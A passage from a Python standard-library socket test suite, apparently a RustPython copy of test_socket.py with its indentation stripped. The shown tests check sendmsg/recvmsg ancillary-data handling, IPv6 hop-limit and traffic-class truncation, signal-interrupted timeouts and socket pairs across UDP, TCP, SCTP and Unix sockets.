self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecomdCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
@testSecomdCmsgTruncInData.client_skip
def _testSecomdCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Derive concrete test classes for different socket types.
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase(unittest.TestCase):
# Base class for interrupted send/receive tests. Installs an
# empty handler for SIGALRM and removes it on teardown, along with
# any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
# Timeout for socket operations
timeout = 4.0
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
# Check that func(*args, **kwargs) raises
# errno of EINTR when interrupted by a signal.
try:
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
finally:
self.setAlarm(0)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
# Check that func(*args, **kwargs), run in a loop, raises
# OSError with an errno of EINTR when interrupted by a
# signal.
try:
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
finally:
self.setAlarm(0)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@unittest.skip("TODO: RUSTPYTHON, plistlib")
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@unittest.skip("TODO: RUSTPYTHON, plistlib")
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
# Passing an actual address here as Python's wrapper for
# sendto() doesn't allow passing a zero-length one; POSIX
# requires that the address is ignored since the socket is
# connection-mode, however.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@unittest.skip("TODO: RUSTPYTHON, plistlib")
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
self.event = threading.Event()
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def assert_sock_timeout(self, sock, timeout):
self.assertEqual(self.serv.gettimeout(), timeout)
